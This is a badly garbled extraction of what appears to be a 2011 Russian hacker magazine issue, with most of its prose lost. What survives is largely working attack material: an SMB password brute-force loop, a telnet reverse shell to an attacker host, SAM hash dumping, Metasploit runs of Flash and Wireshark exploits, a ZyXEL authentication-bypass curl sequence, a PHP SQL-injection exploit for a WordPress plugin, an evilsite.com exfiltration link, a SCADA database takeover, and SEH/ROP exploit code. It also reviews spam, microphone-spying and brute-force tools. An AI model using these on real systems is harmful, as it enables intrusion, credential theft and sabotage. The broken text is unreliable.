, , .
:
tasklist /SVC

dll:
tasklist /P
:
WINPCAP.
:
NETRESEC
, . RawCap (www.netresec.
com/?page=RawCap). , ,
WinPCAP. ,
:
1) 17 ;
2) raw sockets Windows (
, - www.xakep.ru/magazine/
xA/077/112/1.asp);
3) ;
4) ,
WiFi-, loopback- PPP-.
. -, -
: ,

WINDOWS.
:
,
040
. Rawcap .
( ) Windows 7 ( ) Vista (
). -, .NET Framework
2.0. -, .
:
RawCap.exe _ __
. , ,
, , ,
. , . , .
- .
? , (.. ).
, X 07 /150/ 2011
. , -, (
), -,
, - . .

? ? . ,
, .
Ed Skoudis Penetration Testing
Ninjitsu. (www.coresecurity.com/
content/webcast-series-with-sans).
:
C:\> for /L %i in (1,1,255) do @ping 10.10.10.%i n 1
| find "Reply"
for ;
/L , ;
%i ;
in (1,1,255) 1 255 1;
do @ping ping;
10.10.10.%i IP- ;
n 1 ;
| find "Reply" |
find, Replay.
. ,
10.10.10.1-255.
, , .
:
Command1 & Command2 ;
Command1 && Command2 , ;
> ;
>> ;
For /F ;
Command 2 > nul ;
Command 2 >> errors.txt .
, :
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul
:

VIRUSTOTAL.
:
.
,
, . -.
, .
.
, .
Himikat,
caps12-MultiScanner.
forum.antichat.net/thread266146.html.
caps12-security.blogspot.com.
, - - .

. ,
.

. .
. 13 , . X 07 /150/ 2011
, ftp-
| find "Name" && echo 10.10.10.%i
ftp-:
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.
txt & echo open 192.168.0.1 %i > ftp.txt & echo quit >> ftp.txt &
ftp -s:ftp.txt 2>>ports.txt

SMB:
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @
echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j
>> success.txt && net use \\10.10.10.10 /del)
, : , -, , .
.
. ,
telnet. ,
, Vista.
, nix , .
,
:
telnet [attacker_IPaddr] [port1] | /bin/bash | telnet
[attacker_IPaddr] [port2]
.
-.
,
. ,
, , .
. :
1) ;
2) ;
3) ;
4) .
,
MSF
041
:
ORACLE.
:
Oracle
TNS listener.
.
, ,
, login denied, . , ,
.
, .
, , ,
.
( )
ora-userenum. OAK (Oracle Assessment Kit),
David Litchfield (www.databasesecurity.com/dbsec/OAK.
zip). ,
.
:
ora-userenum.exe 192.168.0.1 1521 ORCL1 userlist.txt
192.168.0.1 1521 Oracle;

ORCL1 SID ;
userlist.txt (
OAK).
, , .
:
METASPLOIT
FRAMEWORK.
nmap --script oracle-brute -p 1521 --script-args oraclebrute.sid=ORCL <target>
DNS-:
:
MSF .
. . , . , , . , ,
MSF .
,
, - .

BackTrack. , BT,
. , ,
- , MSF .
Nmap NSE (Nmap Scripting Engine)
. , , . : nmap.org/nsedoc.
. - snmp-:
nmap sU p161 --script=snmp-brute --scriptargs=snmplist=communities.txt <target>
nmap -p53 script dns-zone-transfer script-args

dnszonetransfer.domain=example.com <target>
SMB-.
MS08-067:
nmap -p445 script=smb-check-vulns <target>
MSSQL- (,
) :
nmap --script broadcast-ms-sql-discover
200. , ,
.
dropbox
, sU udp;
p161 snmp ;
--script=snmp-brute , ;
--script-args=snmplist=communities.txt .
MSF.
, MSF Win7.
Oracle (
MSF Win):
042
X 07 /150/ 2011
:
WINDOWS.
:
,
. , c.
.
NTLM- .
gsecdump, fgdump. .
-, (- ). . -, 64- , .
, NTLM- (MS Cache)
Windows. -
,
.
Cain&Abel (www.oxid.it/cain.html), python (code.google.com/p/creddump).
creddump Windows, pycrypto
(www.amk.ca/python/code/crypto). ,
, (hives),
.
ntbackup.exe. ,
. ,
Volume Shadow Copy (VSS).
. , ,
:
Ntbackup.exe backup systemstate /j "Blah-blah-blah" /f
"c:\backup.bkf"
backup , ;
Systemstate
;
/j "Blah-blah-blah"
DVD
;
/f "c:\backup.bkf"
.
dvd
. ,
,
.
. XP 500 . ,
( ) .
( ) .
, C:\WINDOWS\system32\config
, ( )
HKEY_CURRENT_CONFIG System
%systemroot%\repair. HKEY_CURRENT_USER Ntuser.dat
. - HKEY_LOCAL_MACHINE\SAM Sam
, . ,
HKEY_LOCAL_MACHINE\Security Security
, , 10 HKEY_LOCAL_MACHINE\Software Software
, ,
HKEY_LOCAL_MACHINE\System System
. , ( )
HKEY_USERS\.DEFAULT Default
, . Vista 2008 Microsoft
? ntbackup. , .
liveCD, .
. , . ntbackup.exe, ntmsapi.dll,
vssapi.dll %systemroot%\system32 XP

, , , . .
2008
.
? , .
.
Vista 2008 (
R2) : NTBackup can be used
--! ! Pass The Hash!
under Windows Vista and Windows Server 2008
by enabling the Removable Storage Manager
component in Turn Windows features on or off
control panel. ,
. , Win 7 2008
R2 ( ) .

,
. ,

.
:
pwdump.py SYSTEM SAM

( ):
lsadump.py SYSTEM SECURITY
:
cachedump.py SYSTEM SECURITY
, . z
X 07 /150/ 2011
043

iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)
, ! ,
,
. ,
!
01
ADOBE FLASH
PLAYER 10.2.153.1 SWF
CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 11 2011
: sinn3r
CVE id: CVE-2011-0611
Flash Player ,
flash-.
flash- ,
, , , .

.
Adobe Flash Player,
- ,

, , ,
. :
.
: Adobe Flash Player, Adobe Reader Acrobat,
Microsoft Word/Excel ( .wf- doc- xls-
). , Adobe
Reader X sandbox , . , :).
044
EXPLOIT
0x100d01f6
Flash10o.ocx ( Adobe Flash Player 10.2.153.1).
ActionScript, :
Date.prototype.c_fun = SharedObject.prototype.getSize;
Date.prototype.getDay = function ()
{
this.c_fun();
};
var eval(0) = new Date(1.41466385537348e-315);
(eval(0)).getDay();
,
, ,
, SharedObject.prototype.getSize(),
Date ,
SharedObject.prototype.getSize. Date 1.41466385537348e-315, 0x11111110, , ,
heap spraying.
Date.c_fun(),
SharedObject.prototype.getSize(), Date
SharedObject,
, Date (0x11111110),
.
metasploit, :
msf > use exploit/windows/browser/adobe_flashplayer_
flash10o
X 07 /150/ 2011
Flash10o.ocx
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
msf exploit(adobe_flashplayer_flash10o) >
[*] Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B
[*] Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B
[*] Server started.
. (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B)
, ,
Internet Explorer ...
TARGETS
IE 6/7 Windows XP SP3 Windows Vista.
SOLUTION
Adobe Flash Player.
02

WIRESHARK <= 1.4.4
PACKET-DECT.C
CVSSV2
X 07 /150/ 2011
BRIEF
: 18 2011
: Paul Makowski ,
sickness POC, corelanc0d3r , ROP + metasploit.
CVE id: CVE-2011-1591
Wireshark ( Ethereal)
, . .
, Wireshark,
tcpdump, Wireshark

.
,
(promiscuous mode).
Wireshark
,
.
pcap, , . , Wireshark
, ,
, ,
.
EXPLOIT
( wireshark 1.4.1, packetdect.c, 1886):
045
Wireshark
...
/* fill B-Field */
if(pkt_len>DECT_PACKET_INFO_LEN+2)
memcpy((char*)(&(pkt_bfield.Data)), (char*)(pkt_ptr+8),
pkt_len-5-8); // <---
else
memset((char*)(&(pkt_bfield.Data)), 0, 128);
pkt_bfield.Length=pkt_len-DECT_PACKET_INFO_LEN-8;

:
# tcpreplay -i ath0 -t test.pcap
wireshark .
,
metasploit , :
...
pkt_bfield dect_bfield, :
struct dect_bfield
{
guint8 Data[128];
guint8 Length;
};
, 128-
Data, .
,
pcap- . , ,
scapy:
#!/usr/bin/env python
import sys
from scapy import *
wrpcap("test.pcap",Ether(type=0x2323)/("A"*1000))
wireshark, -
046
msf exploit(wireshark_packet_dect) > use exploit/windows/

fileformat/wireshark_packet_dect
msf exploit(wireshark_packet_dect) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(wireshark_packet_dect) > set CMD calc.exe
CMD => calc.exe
msf exploit(wireshark_packet_dect) > exploit
[*] Creating 'passwords.pcap' file ...
[*] Preparing payload
[*] Writing payload to file, 1554 bytes
[*] Generated output file /opt/framework-3.6.0/msf3/data/
exploits/passwords.pcap
wireshark, .
:
# tcpreplay -i ath0 -t /opt/framework-3.6.0/msf3/data/
exploits/passwords.pcap
:)
TARGETS
Win32 ( DEP & ASLR).
X 07 /150/ 2011
, flash-
SOLUTION
Wireshark.
03
ZYXEL ZYWALL USG
CVSSV2
BRIEF
ZyWALL USG
ZyXEL ,
, c,
.
RedTeam Pentesting
,
: .
, .
-
.
EXPLOIT
ZyXEL ZyWALL USG zip-,
zip- .
, 2.21(BQD.2) ZyWALL USG 20
(ZyWALL USG 20_2.21(BDQ.2)C0.zip)
:
221BDQ2C0.bin
221BDQ2C0.conf (7354 bytes)
221BDQ2C0.db
221BDQ2C0.pdf
221BDQ2C0.ri
firmware.xml
221BDQ2C0.bin 221BDQ2C0.db,
, zip- (,

/usr/bin/file).
:
$ unzip -l 221BDQ2C0.bin
Archive: 221BDQ2C0.bin
X 07 /150/ 2011
Name
---compress.img
db/
db/etc/
db/etc/zyxel/
db/etc/zyxel/ftp/
db/etc/zyxel/ftp/conf/
db/etc/zyxel/ftp/conf/htm-default.conf
db/etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filechecksum
filelist
fwversion
kernelchecksum
kernelusg20.bin
wtp_image/
------24 files
$ unzip -l 221BDQ2C0.db
Archive: 221BDQ2C0.db
Name
---db_remove_lst
etc/
...
etc/zyxel/
etc/zyxel/ftp/
etc/zyxel/ftp/.dha/
etc/zyxel/ftp/.dha/dha_idp/
etc/zyxel/ftp/cert/
etc/zyxel/ftp/cert/trusted/
etc/zyxel/ftp/conf/
etc/zyxel/ftp/conf/htm-default.conf
etc/zyxel/ftp/conf/system-default.conf (7354 bytes)
...
filelist
------31 files
, 221BDQ2C0.conf
system-default.conf
.

,
:
PkCrack ;
Elcomsoft Advanced Archive Password Recovery
.
047
ZyXEL

compress.img unsquashfs.
ZyWALL USG -
Apache. , . mod_auth_zyxel.so
/etc/service_conf/httpd.conf,
compress.img.
AuthZyxelSkipPattern,
:
AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /
language
CGI-. , ,
:
https://192.168.0.1/cgi-bin/exportcgi?category=config&arg0=startup-config.conf
Apache
CGI-. ,
/images/ , export-cgi
:
https://192.168.0.1/cgi-bin/export-cgi/images/?category=c
onfig&arg0=startup-config.conf
/images/
AuthZyxelSkipPattern, .
,
.
, file_upload-cgi, , , . /
images/, .
, startup-config.
048
conf, , , . , ,
.
, , /
:
$ curl --silent -o startup-config.conf "https://192.168.0.1/
cgi-bin/export-cgi/images/?category=config&arg0=startupconfig.conf"
$ curl --silent -F ext-comp-1121=50 -F file_type=config -F
nv=1 -F "file_path=@startup-config.conf;filename=startupconfig.conf" https://192.168.0.1/cgi-bin/file_upload-cgi
/images/
TARGETS
ZyXEL USG, 25 2011 ,
.
SOLUTION
, 25 , -.
04
SQL XSS
WORDPRESS SERMONBROWSER
PLUGIN
CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Ma3sTr0-Dz
.
SQL
.
, (
).
X 07 /150/ 2011
WordPress SermonBrowser
EXPLOIT
php,
,
. ( ):
<?php
$t=array(
"db_usr"=>"user()",
"db_ver"=>"version()",
"db_nam"=>"database()",
"usr_nm"=>"user_login",
"passwd"=>"user_pass"
);
function text2hex($string) {
$hex = '';
$len = strlen($string) ;
for ($i = 0; $i < $len; $i++) {
$hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_
LEFT);
}
return $hex;
}
foreach($t as $r=>$y){
$x=@file_get_contents($argv[1].
"?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".
text2hex("<$r>").
",$y,0x".text2hex("<$r>").
"),2+from+wp_users+where+ID=1--"
);
preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);
X 07 /150/ 2011
XSS WordPress SermonBrowser

echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" :
"[-] $r : Failed !\n";
}
?>
TARGETS
WordPress SermonBrowser Plugin <= 0.43
SOLUTION
0.44.1 . z
049

(http://oxdef.info)
-.
OPERA

. ,
Google Chrome.
Opera. ,
!

, -
. :
.
,
-. Opera, , -
. ,
Opera ( ?)
. Chrome
Opera.
.
Opera Google
Chrome. , HTML, CSS JavaScript,
-
050
W3C Widgets specification.

Whats in an Opera extension? (bit.ly/
k5WkoL).
. Opera
( ):
( index.html)
;
, ,
-;
JavaScript- CSS- ,
- (, ,
mailto: );
config.xml ( manifest.json Google
Chrome) -
: , ,
;

.
X 07 /150/ 2011
HTTP://WWW
links
W3C Widgets
specification:
www.w3.org/TR/widgets.
XSS Google Mail Notifier

Opera
(UserJS),
,
, ,
JavaScript-.
-
( ).
:

;
HTML-
(, );
- ( ) ;

JavaScript.
,
,
, :
// ==UserScript==
// @include http://example.com/*
// ==/UserScript==
(function ()
{
var links = document.getElementsByTagName('a');
for(var i = 0; i<links.length; i++) {
if (links[i].href.indexOf('http://' +
document.domain) != 0) {
links[i].innerText = '[->] ' +
links[i].innerText;
}
}
})();
,
,
,
( , ).
X 07 /150/ 2011
Google
Mail Notifier
:
<-> <->
/ <->
, /
, Opera
Extensions API :
window.
widget, opera.extension opera.contexts
, ,
.

.
(
)

.
,
..
:
goo.gl/LwQ50.
Opera Extensions API:
www.opera.com/docs/
apis/extensions/.
XSS:
goo.gl/1ey4L.

:
goo.gl/BIKKM.
Widget Access
Request Policy:
www.w3.org/TR/
widgets-access/.

UserJS-
Opera: www.opera.
com/docs/userjs/.
XSS

Opera Google Chrome (,
..).
Google Mail Notifier.
, ,
Google Chrome, ,
XSS.

.
, , .
, , . ,

(js/menu.js):
WARNING
warning

,

.
...
// Check if there are Messages to display
if(event.data.msg && event.data.msg.length > 0)
{
051
Opera
// Add every message
for(var i=0; i < event.data.msg.length; i++)
{
var tooltip = "<div class='tooltip'><p><u>" +
lang.popup_to + " " + event.data.msg[i].sendermail +
"</u><br/>" + lang.popup_from + " " +
event.data.msg[i].authormail + "<br/><br/></p><p>" +
event.data.msg[i].summary + "</p>"
var msg = $('<div></div>').addClass('message').attr(
"title", tooltip).tooltip({
left: -15
})
.html("<strong>" + event.data.msg[i].authorname +
"</strong> : " + event.data.msg[i].title).click(
{
link: event.data.msg[i].link
}, LoadLink);
$('#message_box').append(msg);
...
,
HTML-.
( Opera Google
Chrome) ,
,
, , RSS-
. ,

.
-
JSON!
JavaScript-, eval(),
, :
052
var msg = eval("(" + response_text + ")");
API
JSON-:
var msg = JSON.parse(response_text);

, .
XSS- , , . Opera
- ( Google Chrome),
.
. , ,
XSS-:
,
,
;
, widget.
preferences ,
,
Reddit Envelope;
Google Notifier
(, ) ;

- (. ).
X 07 /150/ 2011
, , . ,
JavaScript ,
document.cookie .
Opera
, :
,
(, -)
, , ,
API-
(, XMLHttpRequest)
(, iframe, script, img).

, :
...

<access origin="https://mail.google.com"/>
<access origin="https://www.google.com"/>
...
. , ,
,
:
//...
var a = document.createElement('a');
var d = document.getElementById('open');
a.href = "http://evilsite.com/sniff.php?d=...";
a.id = "foo";
a.innerText = 'Open GMail Tab';
d.parentNode.replaceChild(a, d);
Google Chrome, Opera

. , ,
UserJS, - , :
JavaScript-
,
-. ,

,
-.
<access>
,
. , , ,
,
! Google
www.google.com, .
,
XSS-:
, Opera . ,
( )
, DOM.
. ,
, .
(*)
origin ,
;
subdomains
(-
).
Opera ,
Google Chrome. ,
.
,
, - , -
( , ) ,
Opera . ,
, .
, . z
,
.
,
X 07 /150/ 2011
Outro
053

(kaminkov@itdefence.ru),
SCADA
Rockwell Automation 45%
Schneier Electrics 40%
Areva Teleperm XS 25%
Wonderware InTouch 30%
Tekla XPower 20%
Mitsubishi MX4 SCADA 30%
Netcon 3000 15%

SCADA Axeda 34%
21%
metsoDNA 10%
RTA PLS 55%

GH SCADA 45%
PSI Control 33%
GE CIMPCity 45%
GE XA21 EMS 24%
Proficy SCADA iFIX 20%
Areva EMS SCADA 11%
Siemens Win CC 49%
SOLONs SCADA 34%
ABB Ranger 34%

PcVue 11%
RsView SCADA 8%
SCADA Axeda 22%
View Star 750 55%

Pidpa 45%

Proficy SCADA iFIX 30%
CitectSCADA 55%
CitectSCADA 20%
Siemens Win CC 45%
Motorola SCADA 5%
SCADA

. (rusin@itdefence.ru)
Stuxnet, ,
. ?
.
,
.
?
,
- . .
.
,
: ,
, , -
054
, . ,
, ( ).
: (SCADA), ,
.
,
SCADA, ,
X 07 /150/ 2011
154.68.54.XX
1.
3.
172.16.1.0
RS232
TCP/IP
MODBUS
10.0.1.0
2. APM SCADA
, ,
?

, 60%
SCADA
(Windows, Linux). (, ),
QNX,
( ),
(,
).

/ SCADA:
SCADA- ( , /
SCADA);
Teenable Nessus ( SCADA
);
Rapid7 Metasploit Project ( :
exploits/scada/ ).
,
,
nmap. ,
:
,
Stuxnet.
,
. -
X 07 /150/ 2011
( ) : (
,
-), (,
, ) ( , ).
1. .

IPSec SSL,
VPN. , . ,
()

. , .
IP-, ,
, .

. ,

.
GPRS/GSM-,
IP-
.
.

.
, ,
(RS-232 / RS-485)
MODBUS-, MODBUS-
TCP/IP Ethernet /
Industrial Ethernet .
2. - SCADA.
,

HTTP://WWW
links

.
,
,
,
RISI:
securityincidents.org.
DVD
dvd

Stuxnet
Trend Micro.
,
DVD
Teenable
Nessus,
SCADA.
055

Slave-, MODBUS
. , .
, Stuxnet
- , USB-
.
. SCADA, , ,
, .
,
- .
3. (BAN Business Area Network).
,
, .
. .
HMI -
.
.
, .

.
,
, -
. - BAN
: , , -
.
Stuxnet
NMAPa (5.51) ,
LUA NMAP Scripting
Engine, stuxnet-detect. Stuxnet SMB- :
nmap --script stuxnet-detect -p 445 <host>
, , Trend Micro.
DVD, (bit.
ly/chokfa). ,
Stuxnet?
Stuxnet RPC-
. RPC-
() ,
( ). RPC .
(0x00), (0x04).
SMB-over-TCP (TCP 445), ,
Stuxnet (, MS10-061),
DCE/RPC (//browser ), UUID
. !

Stuxnet.
Trend Micro.
056
X 07 /150/ 2011
SCADA Firebird. ( ),
, .
,

.
.
,
. , Cisco
Router and Security Device Manager Cisco 7301,
CISCO SDM. ,
,
.
, :
level 15;
cisco (
,
).
, show running
config, . -
, .
,
. ,
:
, TCL,

;
, , CISCO Cisco IOS Embedded
Packet Capture (EPC) , .
, ,
,
EPC:
# EXEC
enable
# "pktrace1", 256 ,
#
CISCO
secret 7- CISCO-
secret 5 (CISCO type 5 passwords). secret 7,
, Cain and Abel
. ,
:
username jbash enable secret 5
$1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jbash password 7 07362E590E1B1C041B1E124C0A2F2E2
06832752E1A01134D
, md5,
,
, Passwords Pro, John The Ripper, EGB ,
. :
$1$FKKk$t2NOQP.vSScMbwJWERNU0/ (type "5"),
FKKk (salt)
X 07 /150/ 2011
:
openssl passwd -1 -salt FKKk cisco
cisco .
057
SCADA
# 100
monitor capture buffer pktrace1 size 256 max-size 100 circular
# ,
# FastEthernet, ,
#
monitor capture point ip cef ipceffa0/1 fastEthernet-type
0/1 both
#
monitor capture point associate ipceffa0/1 pktrace1
#
monitor capture point start ipceffa0/1
#
show monitor capture buffer pktrace1dump
TCP 502,
, MODBUS TCP. , .
,
,

,
,

2008-2010 .
:
7 2008 , 2 Hatch (
, ), 48

( 2006
Browns Ferry -

);
2008 , Tennessee Valley Authority (TVA)
( 11
, 8 , 3 , 29 ), (GAO, HHS) 2000
.
, , ,
, ;
26 2008 , ,
.
058
CISCO, . , ,
- : , :
. ,
SCADA
DCOM Microsoft Windows,
.
( , )
. , , SDM,
. CISCO secret 7
MD5.
, .
IP-, .
,
SCADA-.
TCP 502-, MODBUS,

, , .
SCADA- ,

. , , .
SNMP- . ,
web-, SCADA -
MODBUS
MODBUS
: ASCII RTU. ( ,
)
. ASCII-
ASCII-.
.
ASCII- (:, ASCII 3A
hex) (CRLF, ASCII 0D 0A hex).
0-9, A-F.

. ,
( ) .
X 07 /150/ 2011

. , :
1) : KASKAD/Web_Clnt.dll/ShowPage?Web_Clnt.ini.
:
Project="C:\Program Files\Kaskad\Projects\
KVisionDemoProject\kaskad.kpr"
2) : KASKAD/Web_Clnt.dll/
ShowPage?../../../Projects/KVisionDemoProject/Configurator/Events.ini
3)
UserName=sysdba
Password= ( XOR 0x1B)
4) :
KASKAD/Web_Clnt.dll/ShowPage?../../../Projects/KVisionDemoProject/
Configurator/Stations.ini
ClntIPAdr1=127.0.01
= 3050
5) TCP 3050 ( Firebird):

\x00\x00\x00\x35\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a
\x4a\x4a\x4a
6) SCADA:
INSERT INTO USERLIST (USERNAME, USERPASSW, NAME, GRPNAME,
FULLNAME, FLAGS, FLAGS_, ALLOWTIME, REGISTERTIME,
LASTENTERTIME, LASTPWDCHANGETIME, PWDKEEPPERIOD, STATIONS,
DROPTIMEOUT, PSPRDACCESS, PSPWRACCESS, PSPRDACCESS_,
PSPWRACCESS_) VALUES ('ITD', '745F87A6B56BACAB', 'itd',
'', ', 3, null, null, '200201-30 13:11:36.0', '2002-01-30 13:11:36.0', '2002-01-30
13:11:36.0', 0, null, null, null, null, null, null);
MODBUS !
, MODBUS,
. , .
1) , PLC
listen only. PLC
, .
MODBUS (Master) ( ). (Slave)
X 07 /150/ 2011
MODBUS .

.
(HOST) .
. PLC- listen only
slave-,
. Slave- , .
.
2) (,
) , . , . , Modbus SCADAPack
ClearSCADA,
60 260 . ,
, :).
3) , .
web- ftp-.
, Appweb Embedded Web Server
, Apache Benchmarking
Tool (ab), :
ab -n 1000 -c 50 http://xxx.xxx.xxx.xxx/index.html
-n
-c
4) .
MODBUS, , , ,
, . -
, ARP-.
:
,
, SCADA.
,
- ( ).
, , , 2. , , ,
, , ,
. ! z
059
,
.
? , ,
. .
Trustwave, 32% . ,
24% , : , VPN + socks chain , . Verison : 65%
.
1%
3%
1%
4%
0 .5%
2%
0 .5%
0 .5%
32%
2%
0 .5%
0 .5%
0 .5%
6%
1%
0 .5% 0 .5%
1%
0 .5%
2%
7%
1%
2%
4%
24%

, Trustwave . ,
, , .
.

28

51.5

87.5

156.5
060
50
100
150
X 07 /150/ 2011
, , Trustwave, - ,
. Verison : 800
, , 90% - , 10% - .

Verison
55%
SQL-
67% /30%
52% /34%
49% /19%
- -

SQL-
CMS
73% /45%
8%
6%
6%
2%
2%
2%
DoS
2%
18%
21% /21%
14% /24%
10% /21%
10% /19%
9% /15%
1% /4%
1% /1%
1% /1%
1% /1%
1% /1%
1% /1%
1% /1%
4% /8%
PCI DSS
, . ,
PCI DSS, . ,
, - , , .
% PCI DSS
97.5%
83.6%
74.6%
80%
92.6%
90.9%
99.2%
98.4%
95.1%
10
11
12
68.9%
60%
48.4%
40%
20%
8.1%
7.4%
X 07 /150/ 2011
061

Digital Security (twitter.com/asintsov))
0DAY

Music Maker 16
, !
MAGIX AG Music
Maker 16.
, ,
DEP ASLR.
, , ,
(
Digital Security).
MAGIX AG
. :
Acidgen Corelan Team
MAGIX AG Music Maker 16.
,
,
PoC. , .

, , .
, MAGIX AG - ,
. , :
, PoC -
.
062
0day
Music Maker 16, .

,
. ,
, . ,

.
, , .
, , .mmm, .
, - _Demo.mmm
HEX- (, 010-Editor). , , ( )
.
.
, , Music Maker
. ,
,
X 07 /150/ 2011
- 2,

, . ,
, , ,
''. ,
.
, .
( Immunity Debuger)
Music Maker .

. Access Violation,
, ,
'a' .mmm . , ,
0day- , - .
, Acidgen ,

Corelan Corelancod3r,
pvefindaddr. , . , , ,
:).
, ,
:
PoC, Music Maker . , ,
. , ,
. : , @ontrif,
!
: SEH- pop
REG/pop REG/retn, ,
- - SafeSEH ( , safeSEH).
, Access Violation,
pop/pop/retn.
, 8 , ESP
8 ( ).
, , SEH-,
,
SEH-. , RETN
,
EIP ,
SEH.
JMP +0x12 ( ,
SEH-, ,
, ). ,
X 07 /150/ 2011
.mmm-
:
aaaaaaaaXXXXYYYYZZZZZZZZZZZ
aaaaaaaa
XXXX SEH, 0x909010EB
(JMP +0x12/nop/nop)
YYYY SEH-,
pop/pop/retn
ZZZZ NOP
:
1. ;
2. Access Violation;
3. YYYY;
4. POP/POP/RETN => XXXX;
5. XXXX = JMP +0x12;
6. ZZZZZ, . .
, .
. Windows 7 x64, DEP
ASLR. - ontrif YYYY
dll', - ASLR BaseFixUP.
YYYY , , YYYY ZZZZ , DEP
. ,
Windows XP. ontrif
, YYYY .
Access Violation , (- ).

, YYYY! ,
, ontrif.
YYYY.
ASLR, DEP.
ROP-
- . ,
, . ,
.
, ,
. SEH
508 ! - ,
. Corelancod3r -
+ egg-hunter- ( , --,
).
, .
, :
SEH 100. , +
. , -
063
- 1
metaploit- pvefindaddr , SEH

, , , .
: SEH (YYYY) ROP-
, ESP - ,
ROP- . YYYY ROP, ESP, RETN,
ROP- ROP-
. Corelancod3r'.
ASLR LTKRN14N.dll LTDIS14n.dll. ,
ADD ESP,4F8 # RETN 4 0x20012026 (
, ASLR).
Access Violation
, aaaaaaaa.
, RETN 4
, , ADD ESP, 40 # RETN. ,
ZZZZ, -.
ROP-
ROP- -,
.
.
, - aaaaaaaa
, ,
:
PPPPPPPP/FFFFFFFFaaaaaaaaXXXXYYYYZZZZZZ
064
PPPPPPPP
FFFFFFFF
aaaaaaaa
YYYY
ZZZZ
,
ROP: 0x20012026
SEH-ROP: 0x20012026
ROP-
. ,
: aaaaaaaaXXXXYYYYZZZZZZ
ROP-.
FFFF, ROP- , FFFF
VirtualAlloc. ,
. , , VirtualProtect,

.
, VirtualAlloc, ,
, ,
.
VirtualAlloc kernel32.dll,
- ASLR, LTDIS14n.dll ,
.data-, , - ASLR.
0x1FFAF160 VirtualAlloc. FFFF, -
. - (ZZZZZ) (FFFF), , FFFF,
X 07 /150/ 2011
!

metasploit-
ESP FFFFF, ROP-, FFFF ,
FFFF. FFFF- ,
PPPPPPPP. , 750 , . FFFFFFFF :
QQQQ1111222233334444WWWWJJJJJJ
QQQQ
- - 2
1111222233334444 - VA, 1
WWWW
- VA,
JJJJJJ
- stage 0 , PPPPPPPP
, , PPPP
, WW..WW
FFFF-, PPPP . stage 0 PPPP, VA,
PPPP , .
, . ,
, :). , Metasploit.

aaa_data = aaa_header # MMM-
aaa_data << "\x00"*1680
aaa_data << aaa_list
aaa_data << "\x00"*25
####
aaa_data << "C:\\aaa\\"
# 7.
aaa_data << shellcode
#
aaa_data << "a"*(target['Size']-shellcode.length)
aaa_data << "a"*328
#
aaa_data << "\x00"*16
####
aaa_data << "x"*320
# 4. -2
aaa_data << rop_gadgets2
# 5. stage 0
aaa_data << shell_jmp
aaa_data << "a"*61
#### ,
X 07 /150/ 2011
MMM-
#
# 2. ROP-: ADD ESP, 40 / RETN
aaa_data << rop_jmp*32
aaa_data << "a"*16
# 1. SEH, YYYY
aaa_data << [target.ret].pack('V')
# 3. 1 RETN
aaa_data << rop_nop*10
# 4. 1
aaa_data << rop_gadgets
aaa_data << "a"*31337
.
.
,
, . egg-hunter,
. Corelancod3r ,
egg-hunter' :).
750 , .
, ,
, , ,
DEFCON-. defcon-russia.ru, ( ). -
, -,
, WEB-, , , ,
.
hackerspace, ,
, .. ,
, ,
.
! z
065

(icq 884888, snipper.ru)
X-TOOLS
: XMProxy
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: xhugo
: ,
xxx.xxx.xxx.xxx;xxx xxx.xxx.xxx.xxx:xxx.
, .

, XMProxy

-.

, .
: Hack Record Book

: Kronus and Svet
: ProxySocksGrabber
: *nix/win
: G1yuK

XMProxy ,
.
,
, , , geoip .
.

. : ,
,

.

: ,
.

, .
, ,
-. ,
-.
GeoIP
. ,
proxy:port - .

066
-

,

, .

spys.ru, ip
, javascript.
,
, , ,
.
:
1. proxy (grabber.py -t 0);
2. socks (grabber.py -t 1).

'-t'.

.
,

.
SQL- (,
n- ) .
!
Hack
Record Book

.
:
, ;
PR (
);

;
;
;
;
;
;
status bar;

( url more);
X 07 /150/ 2011
HTTP ;
drag & drop ;
settings.ini;
SQLite;
.NET 3.5.
:
1. KEY ;
2. .db ;
3. ,
,
, .

bit.ly/jFexpH.
: VK Video Spammer
: Ildon

. ,
, VK Video Spammer .
:
50
;
50
;
;
;
;
;
;
-
(
);
;
;
.
, VK ,

.

mail.
ru.
:

: MicSpy++
Nightmare!

,
. :
1. , ( ,
);
2. ;
3. KHz WMA-
( 8, 16 32).
: (,
10 )
WMA- 03.03.2011.17.17.17.
wma ( ).
:
= ( 10
600 , 1,8 ).
:
MicSpy++.exe C:\randomfolder\ 1800000 16

.
:
C:\randomfolder\
;
1800000 ;
16 WMA KHz.

bit.ly/jnzg7t.
: [mail.ru] Question
Brute
: ZeaL
X 07 /150/ 2011
,
mail.ru.
: [mail.ru] Question
Checker
: ZeaL

,

.
, ,
- 123,
qwerty ..
, ,
:
;
(

,
);
([mail.ru]
Question Brute 1.04).
: MicSpy++
: Nightmar
,

.
;
m.mail.ru (,
);
source-;
;
source;

mail.ru;
;
.

-. z
067
MALWARE
deeonis (deeonis@gmail.com)
,

-,
, .
, .
-,
.

, .

exe,
.
Windows. ,
068

, - .
:
,
. .
X 07 /150/ 2011
Process Explorer

, - , .
, - .
-
.
-, .
.
Windows, , , C:\Documents and Settings\admin\ \
\\. , admin,
All Users Default User.

, , API- CopyFile,
.

,
.
,
,
.
Windows
9- 98- 95- .
win.ini, [windows], , , run=_.
system.ini, [driver32]
_.
_=_ .
, .
Windows.
